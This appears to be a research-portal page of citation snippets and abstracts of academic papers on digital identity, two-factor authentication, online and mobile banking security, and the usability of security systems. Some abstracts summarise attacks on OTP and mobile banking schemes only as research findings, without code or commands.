Purpose–This conceptual article’s primary aim is to identify the significant stakeholders of the digital identity system (DIS) and then highlight the impact of artificial intelligence (AI) on each of the identified stakeholders. It also recommends vital points that could be considered by policymakers while developing technology-related policies for effective DIS. Design/methodology/approach–This article uses stakeholder methodology and design theory (DT) as a primary theoretical lens along with the innovation diffusion theory (IDT) as a sub-theory. This article is based on the analysis of existing literature that mainly comprises academic literature, official reports, whitepapers and publicly available domain experts’ interviews. Findings–The study identified six significant stakeholders, i.e. government, citizens, infrastructure providers, identity providers (IdP), judiciary and relying parties (RPs) of the DIS from the secondary data. Also, the role of IdP becomes insignificant in the context of AI-enabled digital identity systems (AIeDIS). The findings depict that AIeDIS can positively impact the DIS stakeholders by solving a range of problems such as identity theft, unauthorised access and credential misuse, and will also open a possibility of new ways to empower all the stakeholders. Research limitations/implications–The study is based on secondary data and has considered DIS stakeholders from a generic perspective. Incorporating expert opinion and empirical validation of the hypothesis could derive more specific and context-aware insights. Practical implications–The study could facilitate stakeholders to further enrich their understanding of the significance of developing sustainable and future-ready DIS by highlighting the impact of AI on the digital identity ecosystem. Originality/value–To the best of the authors’ knowledge, this article is the first of its kind that has used stakeholder theory, DT and IDT to explain the design and developmental phenomenon of AIeDIS. A list of six significant stakeholders of DIS, i.e. government, citizens, infrastructure providers, IdP, judiciary and RP, is identified through comprehensive literature analysis.
... It should cover several important aspects such as data privacy [1], data access and data integrity [2]. Various methods of data security such as Smart Card usage, Token, Key and biometric have been implemented to ensure the safety of the data in a system [3,4]. This article will explain the data security management using biometric methods. ...
Article
Full-text available
Computer security is a process that controls the entire information system, including network, system and hardware. Important information that must be controlled in a system is the data or information contained in a system. Various methods have been used to ensure that only users with legitimate access to data can use a system. Usernames and passwords have been a common practice by many systems as the first requirement to be fulfilled to access the system, but some systems use the secondary verification for additional confirmation. In this article, Keystroke Dynamics has been used as the user’s second level authentication for the systems that use the keyboard to login into a system. A common problem of system intrusions is that the system fails to identify the user who signs in using the keyboard when the login is correct. There is a possibility that someone else tries to break into the system. To ensure and improve users’ recognition who use the keyboard to enter their logins into the system, Keystroke Dynamics is used as a next-level verification if the login is correct. Soft biometrics is used in the user authentication process using KD method in this study. The soft biometric elements used in this study are culture, gender, educational level (CGPA - Cumulative Grade Point Average) and region of birth (ROB). All of these four soft biometric elements are expected to enhance capabilities in the user authentication process.
... Not every payment transaction carries the same level of risk. There is also a common perception that usability and security are competing goals ([38,39]), so it would be valuable to create a solution that allows improving the usability of card-present payment transactions without undermining security. ...
Article
Full-text available
Electronic card payments are getting more and more popular, mainly because of their simplicity, convenience, processing time and high level of security. The fact that a single payment card is issued for a particular cardholder makes it possible to link a card to various services. In this paper, we investigated a usage of a payment card in the loyalty program that incorporates our Contextual Risk Management System (CRMS) to assure a novel intangible reward: Shorter transaction processing time. In the beginning, we emphasize the importance of soft benefits in modern loyalty programs and recall the risk management algorithms and the reputation system that has been used in the CRMS. Then, using an extensive dataset of 2.5 million payment transaction traces (collected within a year from 68 terminals) we estimate potential benefits for merchants and cardholders and try to predict an effect of this system for the future. We also discuss the impact of this system on the real and user-perceived security level.
... Finally, only a few of the respondents (27.1%) worked in organisations that allowed staff to store official documents in their personal cloud. It is necessary to posit that evidence suggests a trade-off between security and convenience, and technology users are initially inclined to choose a convenient option over a secure option (Kim & Park, 2012; Weir, Douglas, Carruthers, & Jack, 2009). It appears from the data that some of the organisations were more concerned about security than the convenience of technology use for their staff. ...
Article
Full-text available
The study was conducted to identify social media, mobile and cloud (SoMoClo) technologies used by Nigerian professional accountants. It also performed predictive analysis of the Accountants' Training Framework (ATF) and Perception (PCT) on professional accountants' use of SoMoClo technologies. Using a survey design, the study administered an online questionnaire among professional accountants in Nigeria. Some items in the survey were taken from already validated items in the literature, especially from popular theories of technology use. Data were analysed using both descriptive statistics (frequency, mean, mode, and standard deviation) and inferential statistics (binary logistic regression). Findings showed that Nigerian professional accountants claim to proficiently use SoMoClo technologies in their professional capacities. ATF and PCT contributed (in)significantly to the prediction of self-reported use of and intention to use SoMoClo technologies among Nigerian professional accountants. The overarching disruptive and transformative tendencies and evidence of technology are an incentive for professional accountants to constantly unlearn, relearn, initiate, adopt and adjust to emerging trends in the practice of their profession. This study brings to bear the significance of the ATF as a predictor variable for use of technology. A new model for the measurement of “use”, the willingness, readiness and ableness (WRA) framework, was tested.
... An exemplary situation of this would be the OTP code verification that consumers are required to do in order to complete their payment transactions. Authentication significantly impacts on consumer experience, which impacts their digital wallet adoption decision [52]- [54]. Because confidence is a significant influencing factor, digital wallet companies must guarantee that relevant aspects such as authentication are adequately regulated to build customer confidence [55]. ...
Article
Full-text available
This study aimed to determine an efficient framework that caters to the security and consumer satisfaction for digital wallet systems. A quantitative online survey was carried out to test whether the six factors (i.e., transaction speed, authentication, encryption mechanisms, software performance, privacy details, and information provided) positively or negatively impact customer satisfaction. This questionnaire was divided into two sections: the respondents’ demographic data and a survey on security factors that influence customer satisfaction. The questionnaires were distributed to the National University of Malaysia’s professors and students. A sample of 300 respondents undertook the survey. The survey results suggested that many respondents agreed that the stated security factors influenced their satisfaction when using digital wallets. Previous studies indicated that financial security, privacy, system security, cybercrime, and trust impact online purchase intention. The proposed framework in this research explicitly covers the security factors of the digital wallet. This study may help digital wallet providers understand the customer's perspective on digital wallet security aspects, therefore motivating providers to implement appropriately designed regulations that will attract customers to utilize digital wallet services. Formulating appropriate security regulations will generate long-term value, leading to greater digital wallet adoption rates.
Article
Purpose Although the use of online authentication systems in banking services is expanding globally, little is known about cultural differences in forming consumers' responses to these services. This paper examines how the usability of an online security service and culture impact consumers' behaviour. Design/methodology/approach The authors conduct a 2 (usability: high vs low) × 2 (culture: US vs Korea) between-subjects, full factorial design. Findings The results indicate a differential influence of the usability of a security system by culture. In particular, US consumers exhibit greater behavioural intention in a high (vs low) usability condition, whereas Korean consumers showed more favourable responses in a low-usability condition. Moreover, perceived effort is confirmed as a crucial mediator that explains the psychological mechanism of the proposed effect. Practical implications This research contributes to the literature on online banking where security is an important determinant of success. Especially for managers involved in international banking services, the findings of cultural differences offer insights about the importance of local understanding and differentiation of bank services for specific target markets which can enhance consumers' response towards an online security service. Originality/value The current study is one of a very few attempts to examine the role of usability of an online security system in forming consumers' behavioural intention. More importantly, this study integrates the concept of culture to explain how usability influences positive or negative behavioural intention in an international market.
Conference Paper
While second factor authentication (2FA) is now widely available, user adoption is still very low, as most 2FA implementations require significant interaction from the user. In this paper, we present a novel 2FA system, called Wi-Auth, that requires minimal participation from the user. A user, after confirming her credentials with an online service, simply has to place a pre-registered secondary device in close proximity (< 2.5 inches) of the primary device from which the login attempt is being made. Wi-Auth detects the proximity of these two devices by comparing the fine-grained Channel State Information (CSI) of the ambient WiFi signals measured at the two devices. The logic is that two devices in such close proximity will exhibit very similar CSI characteristics. Wi-Auth uses a lightweight two-step matching algorithm to compare the two CSI measurements. We also address (for the first time in the literature) the issue of targeted attacks where an attacker may be co-located with the victim. We implement Wi-Auth using commodity off-the-shelf 802.11n devices and evaluate its performance in three different practical settings including an open office, an apartment and a large meeting space. Our experiments performed at 90 different locations reveal that Wi-Auth can on average achieve 94% authentication accuracy with 5% false positives and 6% false negatives. Moreover, Wi-Auth is very robust in preventing co-located attacks with a 95% attack detection accuracy.
Article
A popular information security-related motivation theory is the Protection Motivation Theory (PMT), which has been studied extensively in many information security contexts with promising results. However, prior studies have found inconsistent findings regarding the relationships within PMT. To shed light on these inconsistent findings, we introduce the attitudinal ambivalence theory to open the black box within PMT. We tested our model on data collected from 1,383 individuals facing potential cyberattacks on their emails in a field experiment. The results of polynomial regression with response surface analysis showed that attitudinal ambivalence is generated from the opposition between an individual’s evaluations of maladaptive rewards and social norms (i.e., descriptive norm and subjective norm). This attitudinal ambivalence, in turn, affects individuals’ evaluations of their coping appraisal process and protection motivation, and ultimately protection behavior. We discuss the theoretical and managerial implications of identifying the determinants and outcomes of attitudinal ambivalence in the information security context. From a theoretical standpoint, our work contributes to the information security literature by incorporating attitudinal ambivalence, which arises from the intrapersonal and interpersonal appraisal processes, into PMT. From a practical standpoint, our work provides insights into designing effective fear appeals to avoid triggering attitudinal ambivalence and thus encourage adoption of security protection behavior.
Chapter
The chapter starts by discussing how hackers' demographics and culture have been changing over the years. Then it proceeds with presenting hacking attacks, techniques, and tools as well as anti-hacking protection mechanisms. In the second part, it moves to ordinary users' profiles and authentication. Here we show how to employ data science and statistical approaches to find out and analyze users' characteristics and their influence on the security level of their computer practice. The chapter presents the computer device security evaluation procedures. It discusses how to conduct analysis, observations, results, and recommendations for users to improve their overall security practices and the security of their devices. Also, it examines web fingerprinting attacks against the privacy protection technology TOR that utilize machine learning, as well as possible protection mechanisms. Examples and use cases are included.
Conference Paper
Most two-factor authentication (2FA) implementations rely on the user possessing and interacting with a secondary device (e.g. mobile phone), which has contributed to the lack of widespread uptake. We present a 2FA system, called Wi-Sign, that does not rely on a secondary device for establishing the second factor. The user is required to sign at a designated place on the primary device with his finger following a successful first step of authentication (i.e. username + password). Wi-Sign captures the unique perturbations in the WiFi signals incurred due to the hand motion while signing and uses these to establish the second factor. Wi-Sign detects these perturbations by measuring the fine-grained Channel State Information (CSI) of the ambient WiFi signals at the device from which the log-in attempt is being made. The logic is that the user's hand geometry and the way he moves his hand while signing cause unique perturbations in the CSI time-series. After filtering noise from the CSI data, principal component analysis is employed for compressing the CSI data. For segmentation of sign-related perturbations, Wi-Sign utilizes a thresholding approach based on the variance of the first-order difference of the selected principal component. Finally, the authentication decision is made by feeding scrupulously selected features to a One-Class SVM classifier. We implement Wi-Sign using commodity off-the-shelf 802.11n devices and evaluate its performance by recruiting 14 volunteers. Our evaluation shows that Wi-Sign can on average achieve 79% TPR. Moreover, Wi-Sign can detect attacks with an average TNR of 86%.
Chapter
One Time Password (OTP) is the most prevalent 2FA method among users and service providers worldwide. It is imperative to assess this 2FA scheme’s security from multiple perspectives, considering its ubiquitous presence in the user’s day-to-day activities. In this work, we assess the security of seven commercially deployed OTP-2FA schemes against malware in the terminal attack model without compromising any 2FA device or authentication services. To implement this attack scenario, we develop a combination of attack modules that capture the password and OTP in different ways during the user’s login attempt. At the same time, it originates a fresh concurrent hidden session from within the terminal or remotely to gain possession of the user account without compromising the service, the network or any external device. We examine the implemented attack against seven different popular public services, which mostly use two variants of OTP-2FA, and observe that almost all of them are vulnerable to this attack. Here, the threat model is practical as the attack components can be installed in the user’s terminal without any root/administrator privilege. Moreover, the attack modules require a small number of resources to run. The whole procedure runs in the background, which makes the attack very hidden in nature and attains low detectability when examined against prominent anti-malware programs, indicating a real-world threat. Our findings after the analysis of the OTP-2FA schemes indicate that an adversary who can install malware on the user’s terminal can defeat almost all popular and widely used OTP-2FA schemes, which are vital security components of online accounts and secure financial transactions. The result also points out that the OTP-2FA scheme does not add extra security on top of the password in the presence of a malicious program in the terminal.
Article
Purpose The purpose of this study is to gain more insight into the impact of cybercrime incidents in the banking sector of Pakistan. This study investigates the significant contribution of information security awareness to the relationship between cybercrimes and organizational performance. Design/methodology/approach The impact of cybercrime incidents on organizational performance is investigated by further exploring the moderating effects of information security awareness. A sample of 302 employees in the banking industry of Pakistan was studied using a survey design. Findings Cybercrime incidents have a negative impact on organizational performance, but information security awareness weakens the negative impact of cybercrimes on organizational performance. Research limitations/implications The present study focuses on the banking sector, so its findings cannot be generalized to other sectors. Further in-depth comparative studies in other sectors with different cultural settings will help to authenticate the research findings. Practical implications Information security awareness weakens the negative impact of cybercrimes on organizational performance; therefore it is important for banks’ HR managers to set up more security training courses to increase employees’ awareness of cybercrimes. Originality/value This study explores the impact of cybercrimes on banks’ performance with the moderating role of employees’ information security awareness. Linking these topics has created a new study within the cybercrimes discipline. The present study also enhances the understanding of employees’ role in combating the impact of cybercrimes on organizational performance.
Chapter
Prior research on privacy protective behaviors has found that online users irrationally trade protection for convenience, and so act against their own privacy preferences. The present article uses expectancy-confirmation theory (ECT) models to explain the continuance behavioral intentions of online users toward privacy-protection practices. It redefines convenience to highlight human behaviors involved in various stages of implementing privacy practice processes. The results show that earlier privacy practice experiences impact the present as well as the future protective behaviors of users, and that convenience-orientation is an important aspect of human nature that should not be inhibited by complex privacy practices. Therefore, to serve online users better, both researchers and practitioners should consider the personal perceptions of convenience of online users when constructing their privacy practices.
Article
To eradicate financial fraud, governments encourage the digitization of financial transactions, which is also reinforced by the digital economy paradigm. Recently, there has been an exponential increase in the number of e-transactions, and the incidence of cyber crimes related to online transaction fraud has also been increasing. To prevent online transaction fraud, the stakeholders of financial-transaction-related companies have implemented various secured authentication and authorization practices at all levels. In this paper, an additional factor for secure authentication for online transactions has been proposed. A third authentication factor, in addition to Personal Identification Number (PIN) and one time password (OTP), has been proposed, which is based on the global positioning system (GPS) location of the user who initiates the transaction. The strategy is to approve / decline the transaction based on a specified distance constraint between the transaction device and the user’s mobile device; this distance is used as an additional authentication factor (third factor) to verify the online transaction. The main objective of this study is to prevent fraudsters from performing online transactions from devices that do not belong to the user and are not currently in the possession of the user. The simulation results show that a high detection rate, i.e., 98.55%, is obtained using the proposed method.
Article
Social context is a vital component of Human-Computer Interaction (HCI) design for security; however, there is little discussion about how to provide security functions based on the social context. This study examines the fit between security design and social contexts in mobile payment applications by investigating preferences and perceptions of security design based on the task-technology fit model and the technology acceptance model. To approach fit of security design in different social contexts, this study followed the approach proposed by design science research and employed a full factorial design experiment. We developed two interfaces—a customizable interface without feedback information and a customizable interface with feedback information—and asked participants to modify security settings in the interfaces according to social contexts, conduct payment transactions, and report their perceptions of security and usability in four payment scenarios. The observed behaviors in relation to security settings and perceptions revealed the fit for security settings and feedback design in different social contexts. Implications were provided to allow insights for security design in mobile payment transactions according to social contexts.
Thesis
Full-text available
Since its introduction, German online banking has stood out for the security of two-factor authentication. Although a user ID and password suffice for access to online banking, transactions must be confirmed by an additional factor. For this purpose, the bank traditionally requests the entry of a transaction number, which the customer obtains using their security procedure. The continued adherence to this separation of transaction initiation and confirmation was accompanied by an ongoing improvement in the security properties of the authorisation procedures. With the availability of smartphones and tablets, however, this trend threatens to reverse and is leading to significant shifts in usage and market share in banks' retail business, since old and new financial service providers alike are adopting a strategy that aims to map as many processes as possible through the customer's mobile device in innovative ways. This development, known as mobile banking, has given rise not only to banking apps and app-based authorisation procedures, but also to an entirely new authentication paradigm which, in contrast to classic online banking, makes it possible for the first time to initiate and confirm all banking transactions from one and the same mobile device. The dissertation deals with the security implications arising from the emergence of mobile banking. It first establishes that more opportunities for attacks by malware arise than was previously the case. Two attacks are central: first, the software implementation allows the attacker to carry out a replication attack in which the app-based authorisation procedure is copied in its entirety to an unauthorised device. Second, the lack of media separation between initiation and confirmation makes real-time manipulation of a user-initiated transaction possible.
Both attacks rest on conceptual deficits that can be traced back to the fact that the mobile banking procedures were introduced without adequate hardware means of protection. For this reason, the banks attempt to protect their apps at the software level with commercial hardening products. Further investigations, however, reveal clear limits to such solutions and make plain that they too cannot compensate for the conceptual deficits. While the established banks can at least be credited with knowing the structural security risk and wanting to address it, the problems at new market entrants go further. Research within this dissertation identified serious security deficiencies at the currently leading German financial start-up, which have their cause in a lack of priority given to IT security. The deficits identified are also relevant with regard to regulatory requirements for the security of mobile financial solutions. Within the framework of the Payment Services Directive II, the European Union has introduced requirements that take effect from 14 September 2019. In this context, the dissertation examines which requirements are to be placed on the security of digital transactions in general and finds broad compatibility in comparison with the legal requirements. A further subject of investigation is the directive conformity of common security procedures in online and mobile banking. Besides the non-conformity of list-based procedures, the work also suggests an inadequacy of procedures based on the SMS telecommunications service as well as those using app-based methods. Although the directive ensures an increase in the security level of banking transactions, the treatise identifies further weaknesses in the transaction process that are not covered by regulation and also have their cause in human factors.
The work therefore addresses, in a user study, the practical security of transactions in online banking. The study concludes that participants are often unaware which steps are essential for security, which is why they check transaction data either not at all or only incorrectly. The banks are part of the problem, since they sometimes provide customers with misleading information. Owing to their applied nature, the results of this work are relevant not only to research but also to the public and the supervisory authorities. Many contributions of the dissertation were picked up by the press, thereby promoting security awareness for banking transactions in the general population. In addition, the Bundesamt für Sicherheit in der Informationstechnik (Federal Office for Information Security) highlights the significance of the work, parts of which were mentioned in the report on the state of IT security in Germany for 2018.
Article
Password authentication is still ubiquitous although alternatives have been developed to overcome its shortcomings such as high cognitive load for users. Using an objective rating scheme Bonneau et al. (2012) demonstrated that replacing the password poses a quest that yet remains unsolved. To shine light on this intractable issue we turn towards subjective user perceptions that influence acceptance and actual use of authentication schemes. We first conducted an extensive rating of objective features of authentication schemes to inform our selection of schemes for this research. Building on the findings thereof, 41 users interacted with twelve different authentication schemes in a laboratory study. The participants’ ratings revealed that the password followed by fingerprint authentication scored highest in terms of preference, usability, intention to use and lowest in terms of expected problems and effort. Usability and effort seem to be important factors for users’ preference rating whereas security and privacy ratings were not correlated with preference. One reason for these factors to fall behind might be their opacity and the resulting difficulty to evaluate them from a user perspective. Further, security and usability perceptions deviated from objective factors and should therefore be carefully considered before making decisions in terms of authentication. Suggestions for making security and privacy features more tangible and to allow for an easier integration in the users’ decision process are discussed.
Article
Full-text available
Purpose: Social media marketing has expanded drastically over the years; despite that, B2B organizations have been unable to use, adapt, and utilize social media marketing, in comparison to B2C (Business to Consumer) organizations. The study intends to examine the antecedents of social media marketing in Business to Business organizations. Methodology: The hypotheses were tested through a survey conducted with 375 employees, belonging to 16 different B2B industries in Pakistan. Reliability analysis, convergent validity, discriminate validity, regression analysis, and mediation tests were carried out to measure the reliability of the measures and examine the proposed hypotheses. Findings: Findings supported the research model and proposed hypotheses. Results suggested a significant influence of learnability, memorability, perceived barriers, perceived usability, and perceived usefulness on actual use in B2B organizations. Findings also confirm the mediating roles of perceived usability and usefulness in the framework. Practical Implications: Usage and adoption of social media marketing in B2B organizations can be improved if they invest in training programs that facilitate learning and memorability of social media tools. Perceived barriers can be eliminated if companies can reassure employees of the relevance and efficiency of social media marketing in their business environment. Keywords: B2B, Business to Business, Industrial Marketing, Social media, TAM
Article
We present a secure two-factor authentication (TFA) scheme based on the user’s possession of a password and a crypto-capable device. Security is “end-to-end” in the sense that the attacker can attack all parts of the system, including all communication links and any subset of parties (servers, devices, client terminals), can learn users’ passwords, and perform active and passive attacks, online and offline. In all cases the scheme provides the highest attainable security bounds given the set of compromised components. Our solution builds a TFA scheme using any Device-enhanced Password-authenticated Key Exchange (PAKE), defined by Jarecki et al., and any Short Authenticated String (SAS) Message Authentication, defined by Vaudenay. We show an efficient instantiation of this modular construction, which utilizes any password-based client-server authentication method, with or without reliance on public-key infrastructure. The security of the proposed scheme is proven in a formal model that we formulate as an extension of the traditional PAKE model. We also report on a prototype implementation of our schemes, including TLS-based and PKI-free variants, as well as several instantiations of the SAS mechanism, all demonstrating the practicality of our approach. Finally, we present a usability study evaluating the viability of our protocol contrasted with the traditional PIN-based TFA approach in terms of efficiency, potential for errors, user experience, and security perception of the underlying manual process.
Article
Full-text available
Despite concerns raised by practitioners, the potential downside of the information security demands imposed by organizations on their employees has received limited scholarly attention. Our research focuses on information security fatigue (hereafter security fatigue), which is defined as a socio‐emotional state experienced by an individual who is tired of and disillusioned with security policies and their associated guidelines and procedures. This research delves into the security fatigue concept, investigates its antecedents and reports how fatigue affects employee security policy compliance (and non‐compliance). Since security fatigue is not well articulated in the literature and there is limited understanding of its antecedents and consequences, we take a research approach that affords novel insight into this phenomenon. Specifically, we conduct 38 in‐depth interviews with business and IT professionals, and then use a qualitative approach to construct a model, including seven research propositions, to highlight the key aspects of security fatigue. Our results indicate that four distinct antecedents contribute to security fatigue, which result in three unique consequences. We discuss security fatigue in relation to past theoretical views and related concepts within the security policy compliance literature and identify directions for future research.
Article
Full-text available
Two-factor authentication (2FA) is a recommended or imposed authentication mechanism for valuable online assets. However, 2FA mechanisms usually exhibit user experience issues that create user friction and even lead to poor acceptance, hampering the wider spread of 2FA. In this paper, we investigate user perceptions of 2FA through in-depth interviews with 42 participants, revealing key requirements that are not well met today despite recently emerged 2FA solutions. First, we investigate past experiences with authentication mechanisms emphasizing problems and aspects that hamper good user experience. Second, we investigate the different authentication factors more closely. Our results reveal particularly interesting preferences regarding the authentication factor "ownership" in terms of properties, physical realizations, and interaction. These findings suggest a path towards 2FA mechanisms with considerably better user experience, promising to improve the acceptance and hence, the proliferation of 2FA for the benefit of security in the digital world.
Chapter
In this paper, the authors compare the usability of SMS mobile banking and automated IVR telephone banking. Participants (N = 116) used SMS banking and IVR banking to find their account balance in a repeated-measures experiment. IVR banking scored higher for usability metrics: effectiveness, attitude, and quality. There was no clear difference in rank order of preference between the two channels. Participants gave positive comments regarding speed and efficiency with SMS banking, but had serious doubts over the security of the SMS channel, impacting consumer trust in SMS banking. The authors argue that usability problems and security concerns are a major factor in the low adoption of SMS mobile banking. Older users were less positive in general to SMS banking compared with the more established IVR banking. Older users had lower first time completion rates for SMS banking and gave IVR banking higher attitude and quality scores.
Article
While mobile payment services have been flourishing in China, users have continually questioned the security of these transactions. Although customization has been proposed as a vital factor for mobile commerce, minimal knowledge exists regarding how it affects users’ perceived security in mobile payment transactions. A quantitative diary study was therefore conducted to provide insight into the personality traits that motivate customization behaviors in security, and how such behaviors influence perceived security under different use contexts in relation to mobile payments. First, an instrument for the diary study was developed through an interview. Then, 134 responses from mobile payment users were used to examine the relationships between personality traits and customization behaviors. Among them, the diary was completed by 67 mobile payment users who reported their perceived security for 1094 recoded payment events across various use contexts for periods ranging between 5 and 15 days. The results showed that the personality traits of extraversion and intellect influence users’ customization behaviors and these behaviors have a positive effect on perceived security. Additionally, the relationship between customization behaviors and perceived security was moderated by the task and technical contexts. Based on these findings, design implications and opportunities for mobile payment services are described.
Article
App stores provide access to millions of different programs that users can download on their computers. Developers can also make their programs available for download on their websites and host the program files either directly on their website or on third-party platforms, such as mirrors. In the latter case, as users download the software without any vetting from the developers, they should take the necessary precautions to ensure that it is authentic. One way to accomplish this is to check that the published file’s integrity verification code—the checksum—matches that (if provided) of the downloaded file. To date, however, there is little evidence to suggest that such a process is effective. Even worse, very few usability studies about it exist. In this article, we provide the first comprehensive study that assesses the usability and effectiveness of the manual checksum verification process. First, by means of an in-situ experiment with 40 participants and eye-tracking technology, we show that the process is cumbersome and error-prone. Second, after a 4-month-long in-the-wild experiment with 134 participants, we demonstrate how our proposed solution—a Chrome extension that verifies checksums automatically—significantly reduces human errors, improves coverage, and has only limited impact on usability. It also confirms that, sadly, only a tiny minority of websites that link to executable files in our sample provide checksums (0.01%), which is a strong call to action for web standards bodies, service providers, and content creators to increase the use of file integrity verification on their properties.
Chapter
Full-text available
Security experts frequently refer to people as “the weakest link in the chain” of system security. Famed hacker Kevin Mitnick revealed that he hardly ever cracked a password, because it “was easier to dupe people into revealing it” by employing a range of social engineering techniques. Often, such failures are attributed to users’ carelessness and ignorance. However, more enlightened researchers have pointed out that current security tools are simply too complex for many users, and they have made efforts to improve user interfaces to security tools. In this chapter, we aim to broaden the current perspective, focusing on the usability of security tools (or products) and the process of designing secure systems for the real-world context (the panorama) in which they have to operate. Here we demonstrate how current human factors knowledge and user-centered design principles can help security designers produce security solutions that are effective in practice.
Article
Full-text available
The e-government paradigm became an essential path for governments to reach citizens and businesses and to improve service and public performance. One of the important tools used in political and administrative venues is e-voting, where ICT tools are used to facilitate the process of voting for electing representatives and making decisions. The integrity and image of such applications won't be maintained unless strict measures on security and authenticity are applied. This chapter explores the e-voting process, reviews the authentication techniques and methods that are used in this process and proposed in the literature, and demonstrates few cases of applying e-voting systems from different countries in the world. Conclusions and proposed future work are stated at the end of the chapter.
Article
Full-text available
Recent results from usability studies of security systems have shown that end-users find them difficult to adopt and use. In this paper we argue that improving the usability of security technology is only one part of the problem, and that what is missed is the need to design usable and useful systems that provide security to end-users in terms of the applications that they use and the tasks they want to achieve. We propose alternate ways of building and integrating security technologies into applications and usability methods for evaluating how successful our prototypes are. We believe that the end results of designing usable and useful (from the end-user perspective) systems will be secure applications which will reflect the needs of users who are increasingly using computers away from the office and in a wider variety of networked configurations.
Article
Full-text available
This paper examines the current trends in the e-commerce revolution that has been set in motion in the Malaysian banking sector and reports on an empirical research study that was carried out in Malaysia to study the customers’ preference for electronic banking and the factors which they considered influenced the adoption of electronic banking. Results based on the analysis of data relating to 300 respondents indicate that while there are no significant differences between the age and educational qualifications of the electronic and conventional banking users, some differences exist on other demographic variables. Analysis further reveals that accessibility of the Internet, awareness of e-banking, and customers’ reluctance to change are the factors that significantly affected the usage of e-banking in Malaysia. The paper discusses the implications of these. Limitations of the study are highlighted and further research directions are suggested.
Conference Paper
Full-text available
Understanding the relation between usability measures seems crucial to deepen our conception of usability and to select the right measures for usability studies. We present a meta-analysis of correlations among usability measures calculated from the raw data of 73 studies. Correlations are generally low: effectiveness measures (e.g., errors) and efficiency measures (e.g., time) have a correlation of .247 ± .059 (Pearson's product-moment correlation with 95% confidence interval), efficiency and satisfaction (e.g., preference) one of .196 ± .064, and effectiveness and satisfaction one of .164 ± .062. Changes in task complexity do not influence these correlations, but use of more complex measures attenuates them. Standard questionnaires for measuring satisfaction appear more reliable than homegrown ones. Measures of users' perceptions of phenomena are generally not correlated with objective measures of the phenomena. Implications for how to measure usability are drawn and common models of usability are criticized.
Article
Full-text available
This article classifies common Internet banking authentication methods regarding potential threats and their level of security against common credential stealing and channel breaking attacks, respectively. The authors present two challenge/response Internet banking authentication solutions, one based on short-time passwords and one certificate-based, and relate them to the taxonomy above. They further outline how these solutions can be easily extended for nonrepudiation (that is, transaction signing), should more sophisticated content manipulation attacks become a real problem. Finally, they summarize their view on future requirements for secure Internet banking authentication and conclude by referencing real-life implementations.
Article
The importance of password security which is considered as an essential form of user authentication both on the Internet and for internal organizational computing systems is discussed. Password protection schemes are used to protect relatively low-sensitivity systems such as access to online archives as well as highly sensitive corporate intranets or personal bank accounts. The growth of e-commerce has led to a huge increase in the numbers of passwords required by individual users, very often duplicated over and over throughout the Web. In such an environment, a password, and all the accounts it provides access to, can no more be secure than the weakest system using that password.
Article
Usability and context are often more important than the absolute effectiveness of authentication. It's why the simple password refuses to die, reports William Knight
Article
How to measure usability is an important question in HCI research and user interface evaluation. We review current practice in measuring usability by categorizing and discussing usability measures from 180 studies published in core HCI journals and proceedings. The discussion distinguishes several problems with the measures, including whether they actually measure usability, if they cover usability broadly, how they are reasoned about, and if they meet recommendations on how to measure usability. In many studies, the choice of and reasoning about usability measures fall short of a valid and reliable account of usability as quality-in-use of the user interface being studied. Based on the review, we discuss challenges for studies of usability and for research into how to measure usability. The challenges are to distinguish and empirically compare subjective and objective measures of usability; to focus on developing and employing measures of learning and retention; to study long-term use and usability; to extend measures of satisfaction beyond post-use questionnaires; to validate and standardize the host of subjective satisfaction questionnaires used; to study correlations between usability measures as a means for validation; and to use both micro and macro tasks and corresponding measures of usability. In conclusion, we argue that increased attention to the problems identified and challenges discussed may strengthen studies of usability and usability research.
Article
Statements which have appeared in recent months about two-factor authentication are not just incorrect – they are irresponsible. Oversimplification of the October 2005 Federal Financial Institutions Examination Council (FFIEC) recommendations has recently led to sensational headlines. Another view needs to be voiced.
Article
The need for securing online banking services by the banks using cheap, portable EMV-compliant smart card readers, in a bid to protect a lucrative banking channel, is discussed. Token-based random number generator systems, such as those available from RSA and Activcard, generate one-time registration passwords and are popular in Sweden. The long-term solution for online authentication is the use of portable EMV-compliant smart card readers that incorporate a challenge-response capability. Some service providers, such as Sweden's Post Girot, plan to develop this solution by expanding their public key infrastructure to include EMV-based web authentication.
Article
This chapter discusses the conduct of research to guide the development of more useful and usable computer systems. Experimental research in human-computer interaction involves varying the design or deployment of systems, observing the consequences, and inferring from observations what to do differently. For such research to be effective, it must be owned—instituted, trusted and heeded—by those who control the development of new systems. Thus, managers, marketers, systems engineers, project leaders, and designers as well as human factors specialists are important participants in behavioral human-computer interaction research. This chapter is intended as much for those with backgrounds in computer science, engineering, or management as for human factors researchers and cognitive systems designers. It is argued in this chapter that the special goals and difficulties of human-computer interaction research make it different from most psychological research as well as from traditional computer engineering research. The main goal, the improvement of complex, interacting human-computer systems, requires behavioral research but is not sufficiently served by the standard tools of experimental psychology such as factorial controlled experiments on pre-planned variables. The chapter contains about equal quantities of criticism of inappropriate general research methods, description of valuable methods, and prescription of specific useful techniques.
Article
This paper reports on a study investigating the strengths and weaknesses of questionnaires as software evaluation tools. Two major influences on the usefulness of questionnaire-based evaluation responses are examined: the administration of the questionnaire, and the background and experience of the respondent. Two questionnaires were administered to a large number of students in an introductory programming class. The questionnaires were also given to a group of more experienced users (including course proctors). Respondents were asked to evaluate the text editor used in the class along a number of dimensions; evaluation responses were solicited using a number of different question types. Another group of students received the questionnaire individually, with part of it presented on the computer; a third group also evaluated an enhanced version of the editor in followup sessions.
Article
This paper describes results of a usability study of contrasting user-interface designs for Internet Banking (eBanking). Two specific interface metaphors were compared in the first experiment, linear form filling and array editing interaction modes. Terminology in the interaction dialogue was compared in the second experiment, using typical banking language and a generic, plain language interface. This research aimed to perform usability evaluation and comparison of the alternative interface designs to illuminate the development of new eBanking services. This research involved sixty-one participants (Internet users and customers of the involved Bank) exploring the designs in controlled experiments involving hands-on experience. Banks are interested in ensuring their eBanking services are highly customer-centric and that the interface matches customer expectations in order to drive customers towards this lower cost channel. The results of the first experiment (N=32, where N indicates the number of participants in the cohort) concluded that the simple form-filling metaphor, taken from the traditional paper-based procedure, was generally more usable than a Spreadsheet metaphor. In the second experiment (N=29), it was found that although banking terminology was not completely understood across the cohort, the instructional language changes did not impact significantly on usability.
Article
